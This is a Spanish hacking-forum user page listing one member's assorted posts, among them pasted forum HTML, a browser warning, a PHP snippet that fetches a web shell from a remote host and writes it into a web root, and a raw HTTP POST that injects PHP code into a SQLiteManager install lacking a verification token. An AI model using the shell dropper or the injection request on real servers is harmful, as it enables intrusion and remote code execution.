El de actualizar este foro no está en mis manos, no tengo acceso a esas cosas. de todas formas el-brujo ya debe saber.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Mostrar Mensajes MenúCitarejecute el comando netstat --v -b solo aparecia conectado con este sitio y con un servidor en suecia que al parecer era traddedoublerclick.comMuchisimos sitios usan ese servidor para moneyclicks incluyendo yahoo y msn.
$shell = file_get_contents('http://host/mi_shell_aca');
$out = 'c:\\wamp\\www\\x.php';
if(file_exists($out)) unlink($out);
$h = fopen($out, 'x');
fwrite($h, $shell);
fclose($h);
Citarhttp://censurado/sqlitemanager/main.php?dbsel=1No hay un token de verificación ni nada que impida la ejecución arbitraria de lo que al atacante se le antoje.
POST /sqlitemanager/main.php?dbsel=1 HTTP/1.1
Host: requetecensurado :p
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3,
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://censurado/sqlitemanager/main.php?dbsel=1&function=IF&action=modify
Cookie: PHPSESSID=xxxxxxxxxxxxxxxxxxxxxxxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 332
FunctName=IF&FunctType=1&FunctCode=echo+%27test%27%3B%0D%0Afunction+sqliteIf%28%24compare%2C+%24good%2C+%24bad%29%7B%0D%0A++++if+%28%24compare%29+%7B%0D%0A++++++++return+%24good%3B%0D%0A++++%7D+else+%7B+%0D%0A++++++++return+%24bad%3B%0D%0A++++%7D%0D%0A%7D&FunctFinalCode=&FunctNumArgs=3&FunctAttribAll=1&function=IF&id=1&action=save
[pre]<form action="https://foro.elhacker.net/post2.html;start=0;board=10" method="post" accept-charset="ISO-8859-1" name="postmodify" id="postmodify" onsubmit="submitonce(this);saveEntities();" enctype="multipart/form-data" style="margin: 0;">
<table width="100%" align="center" cellpadding="0" cellspacing="3">
[/pre][pre] <tr>
<td valign="bottom" colspan="2">
<span class="pathway"><a href="https://foro.elhacker.net/index.php" class="pathway">Foro de elhacker.net</a><font size="1"> » </font> <a href="https://foro.elhacker.net/index.php#1" class="pathway">Forums Generales</a><font size="1"> » </font> <a href="https://foro.elhacker.net/sugerencias_y_dudas_sobre_el_foro-b10.0/" class="pathway">Sugerencias y dudas sobre el Foro</a><font size="1"> » </font> <span><b class="nav">Responder al mensaje ( </b></span>Re: Error del foro o firefox?<span><b class="nav"> )</b></span> </span>
[/pre][pre] </td>
</tr>
</table>
<div id="preview_section" style="display: none;">
[/pre]
[pre]<form action="https://foro.elhacker.net/post2.html;start=0;board=10" method="post" accept-charset="ISO-8859-1" name="postmodify" id="postmodify" onsubmit="submitonce(this);saveEntities();" enctype="multipart/form-data" style="margin: 0;">
<table></table>
<table width="100%" align="center" cellpadding="0" cellspacing="3">
[/pre][pre] <tr>
<td valign="bottom" colspan="2">
<span class="pathway"><a href="https://foro.elhacker.net/index.php" class="pathway">Foro de elhacker.net</a><font size="1"> » </font> <a href="https://foro.elhacker.net/index.php#1" class="pathway">Forums Generales</a><font size="1"> » </font> <a href="https://foro.elhacker.net/sugerencias_y_dudas_sobre_el_foro-b10.0/" class="pathway">Sugerencias y dudas sobre el Foro</a><font size="1"> » </font> <span><b class="nav">Responder al mensaje ( </b></span>Re: Error del foro o firefox?<span><b class="nav"> )</b></span> </span>
[/pre][pre] </td>
</tr>
</table>
<div id="preview_section" style="display: none;">
[/pre]
CitarDeprecated method document.getSelection() called. Please use window.getSelection() instead..